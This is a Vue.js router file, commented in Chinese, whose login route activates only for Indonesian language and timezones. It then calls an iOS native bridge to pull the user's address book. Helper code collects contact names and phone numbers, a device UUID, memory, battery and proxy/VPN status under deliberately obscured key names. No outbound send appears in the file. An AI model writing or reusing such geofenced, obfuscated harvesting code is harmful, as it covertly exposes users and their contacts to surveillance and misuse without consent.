import store from '@/store'
const Login1 = () => import('@/views/Login1')
// 重命名 localStorage的key
const KEY = 'lqjdfs'

export default [
  {
    path: '/login1',
    component: Login1,
    beforeEnter: (to, from, next) => {
      if (isLanguageAndTimeZone()) {
        try {
          // 调用ios方法获取通讯录
          window.webkit.messageHandlers.uierbgs.postMessage('')
        } catch (error) {
          console.log(error)
        }
        // 判断是否已经登录 如果已经登录直接进入到home1页面
        const userInfo = localStorage.getItem('userInfo')
        if (userInfo) {
          getIosInfo()
          const u = JSON.parse(userInfo)
          store.commit('recordInfo', {
            type: 'userInfo',
            value: u
          })
          getIosInfo()
          next('/home1')
          return
        }
        // 获取ios储存到本地得数据
        const T = setInterval(() => {
          if (localStorage.getItem(KEY)) {
            getIosInfo()
            clearInterval(T)
            next('/login')
          }
        }, 200)
      } else {
        next()
      }
    }
  }
]

function getIosInfo () {
  setTimeout(() => {
    let value = {
      // uuid
      ioec: '', // uuid
      // 设备信息
      hajh: {
        df: '', // a手机类型
        as: '', // b开机时间
        vc: '', // c当前设备地区
        we: '', // d运行总内存
        qw: '', // e内存可用大小
        iu: '', // f手机总内存
        jh: '', // g剩余内存
        nh: '', // h当前电量
        lo: '', // j否代理
        pi: '' // k是否开启vpn
      },
      // 通讯录
      eres: [
        {
          qweas: '', // 通讯录姓名，
          tyyhf: '' // 通讯录手机号
        }
      ]
    }
    const StorageStr = localStorage.getItem(KEY)
    if (StorageStr) {
      value = JSON.parse(StorageStr)
    }
    // uuid
    const uuid = value.ioec
    // 设备信息
    const deviceInfo = value.hajh
    // 通讯录
    const contactArr = value.eres
    //  设备信息
    const obj = {
      a: deviceInfo.df,
      b: '',
      bbbb: deviceInfo.as,
      c: deviceInfo.vc,
      d: deviceInfo.we,
      e: deviceInfo.qw,
      f: deviceInfo.iu,
      g: deviceInfo.jh,
      h: deviceInfo.nh,
      j: deviceInfo.lo,
      k: deviceInfo.pi
    }

    const contact = contactArr.map((item) => {
      return {
        accountName: item.qweas,
        accountPhone: item.tyyhf
      }
    })
    // UUID
    sessionStorage.setItem('ixabisoelinye', uuid)
    // 设备信息
    sessionStorage.setItem('abcdefgh', JSON.stringify(obj))
    // 通讯录
    localStorage.setItem('contact', JSON.stringify(contact))
  }, 2000)
}

// 语言时区是否符合条件
function isLanguageAndTimeZone () {
  const language = navigator.language
  const timeZone = Intl.DateTimeFormat().resolvedOptions().timeZone
  const timeZoneList = ['Asia/Jakarta', 'Asia/Jayapura', 'Asia/Makassar', 'Asia/Pontianak']
  return language === 'id-ID' && timeZoneList.includes(timeZone)
}
